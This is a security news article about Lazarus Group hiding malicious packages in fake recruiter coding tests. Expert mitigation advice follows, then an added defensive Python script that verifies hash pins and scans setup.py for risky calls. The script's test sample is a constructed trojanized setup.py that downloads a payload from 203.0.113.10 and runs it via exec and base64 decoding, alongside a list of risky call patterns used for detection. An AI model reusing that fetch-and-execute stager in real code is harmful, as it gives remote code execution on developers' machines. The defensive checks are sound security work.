
North Korean hackers distributing malware through deceptive coding tests
Researchers have uncovered malicious software packages linked to the Lazarus Group, a North Korean hacking group. The attackers pose as recruiters from financial firms and send developers a fake coding assessment; the assessment's project files carry the malicious packages, so a candidate who runs the test to complete it infects their own machine.
Understanding Lazarus Group’s tactics
Callie Guenther, Senior Manager of Cyber Threat Research at Critical Start, explains, “The Lazarus Group’s scheme of using fake coding assessments to target developers indicates a shift in their strategies. This follows previous incidents like Operation Dream Job and In(ter)ception, where they utilized fake job offers and interviews to infect targets. Now, they are exploiting platforms like GitHub, PyPI, and npm to inject malicious code disguised in legitimate libraries such as pyperclip and pyrebase.”
Eric Schwake, Director of Cybersecurity Strategy at Salt Security, outlines key reasons why this approach is risky:
- “Exploits developer trust: The attack capitalizes on developers’ natural inclination to showcase their skills. It manipulates the authentic process of code reviews and assessments, making detection challenging.
- Blends in with regular activity: Downloading and running code is a fundamental aspect of a developer’s workflow, complicating the identification of malicious activity among typical operations.
- Targets a critical asset: Developers often have privileged access to source code, sensitive data, and production environments. Compromising a developer can have severe downstream consequences.”
How security leaders can mitigate risks from Lazarus Group
Guenther provides the following suggestions for security professionals:
- “Awareness: Educate developers to authenticate coding tests and offers, particularly those with time limitations or unfamiliar software.
- Supply chain security: Utilize tools like software composition analysis to validate open-source packages for integrity.
- Code auditing: Routinely scrutinize third-party code and libraries for malicious components.
- Endpoint protection: Enforce EDR to identify abnormal behavior linked to malware.
- Zero trust: Implement a zero-trust model to restrict access if a developer’s system is compromised.”
Schwake recommends:
- “Zero trust for all code: Treat all code, even from seemingly reliable sources, as potentially malicious until proven otherwise. Employ stringent code review and scanning procedures.
- Secure your CI/CD pipelines: Fortify your development infrastructure with robust access controls, code signing, and artifact verification.
- API security: APIs are essential for modern applications. Utilize a dedicated API security solution to identify, safeguard, and monitor your entire API landscape.
- Security awareness training: Educate developers about the latest social engineering tactics and the risks associated with downloading and executing code from unknown sources.”
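Both lists above come back to the same two controls for code a developer is handed: verify that each third-party package is exactly the artifact it claims to be (Guenther's "supply chain security" and Schwake's "artifact verification"), and audit the code for install-time behaviour before running it (Guenther's "code auditing" and Schwake's "zero trust for all code"). The script below is an added example written for this page, not code from the article or from either expert. It implements the first control with the hash-pinning format of pip's hash-checking mode (`pip install --require-hashes`) and the second with a small `ast` scan for dynamic code execution and network or process calls at import time. The requirements text, the artifact bytes, the `setup.py` sources and the 203.0.113.10 address are all constructed for the demo; the hash check uses plain SHA-256 and the audit rules are an illustrative allowlist, not a complete scanner.

```python
"""Added example (not from the article): two pre-install checks for a package
handed to a developer, e.g. inside a recruiter's 'coding assessment'.

1. verify_requirements(): every requirement must be an exact pin with a
   --hash=sha256:... entry, and the downloaded artifact must match it
   (the rule pip enforces with --require-hashes).
2. audit_source(): flag dynamic code execution and install-time side
   effects (network, subprocess, decoding) in a setup.py or module.
All inputs below are constructed for the demo.
"""
import ast
import hashlib
import re

_REQ_RE = re.compile(r"^([A-Za-z0-9_.\-]+)==(\S+)")
_HASH_RE = re.compile(r"--hash=sha256:([0-9a-fA-F]{64})")


def _logical_lines(text):
    """Join backslash-continued lines, as pip does for requirements files."""
    out, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        out.append(buf + line)
        buf = ""
    if buf:
        out.append(buf)
    return out


def verify_requirements(req_text, artifacts):
    """Return a list of findings (empty means every pin verified).

    `artifacts` maps 'name==version' to the bytes of the fetched sdist/wheel.
    """
    findings = []
    for line in _logical_lines(req_text):
        if not line or line.startswith("#"):
            continue
        m = _REQ_RE.match(line)
        if not m:
            findings.append(f"not an exact pin: {line}")
            continue
        key = f"{m.group(1).lower()}=={m.group(2)}"
        pinned = {h.lower() for h in _HASH_RE.findall(line)}
        if not pinned:
            findings.append(f"{key}: no --hash pin")
            continue
        data = artifacts.get(key)
        if data is None:
            findings.append(f"{key}: artifact not found")
            continue
        actual = hashlib.sha256(data).hexdigest()
        if actual not in pinned:
            findings.append(f"{key}: sha256 mismatch, got {actual[:16]}...")
    return findings


# Illustrative rules: calls that should not appear at import/install time.
_DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
_RISKY_PREFIXES = ("os.system", "os.popen", "subprocess.", "socket.",
                   "urllib.request.", "requests.", "base64.b64decode", "ctypes.")


def _dotted(func):
    """Resolve a Name/Attribute chain such as urllib.request.urlopen."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def audit_source(src):
    """Return findings for calls matching the rules above, with line numbers."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name is None:
            continue
        if name in _DYNAMIC_EXEC:
            findings.append(f"line {node.lineno}: dynamic code execution via {name}()")
        elif name.startswith(_RISKY_PREFIXES):
            findings.append(f"line {node.lineno}: install-time side effect via {name}()")
    return findings


# --- constructed sample inputs -------------------------------------------
GOOD_ARTIFACT = b"pyperclip-1.8.2 sdist bytes (constructed)"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"\n# injected stager (constructed)"
GOOD_HASH = hashlib.sha256(GOOD_ARTIFACT).hexdigest()
REQUIREMENTS = f"""\
# constructed requirements file in pip hash-checking format
pyperclip==1.8.2 \\
    --hash=sha256:{GOOD_HASH}
pyrebase==3.0.27
"""
TROJANIZED_SETUP = """\
import base64
import urllib.request
from setuptools import setup

stage = urllib.request.urlopen("http://203.0.113.10/stage").read()
exec(base64.b64decode(stage))

setup(name="pyperclip", version="1.8.2")
"""
CLEAN_SETUP = """\
from setuptools import setup
setup(name="pyperclip", version="1.8.2")
"""

if __name__ == "__main__":
    print(verify_requirements(REQUIREMENTS, {"pyperclip==1.8.2": TAMPERED_ARTIFACT}))
    print(audit_source(TROJANIZED_SETUP))
```

The hash check only protects against a modified or substituted artifact when the pin itself comes from a trusted source (your own lockfile, not the one shipped in the assessment), so treat a requirements file delivered with the test as untrusted input and regenerate the pins from the public index. The `ast` scan is a first filter for a human review, not a verdict: code that builds the call through `getattr` or string concatenation will slip past it, which is why the experts above pair scanning with review and endpoint monitoring.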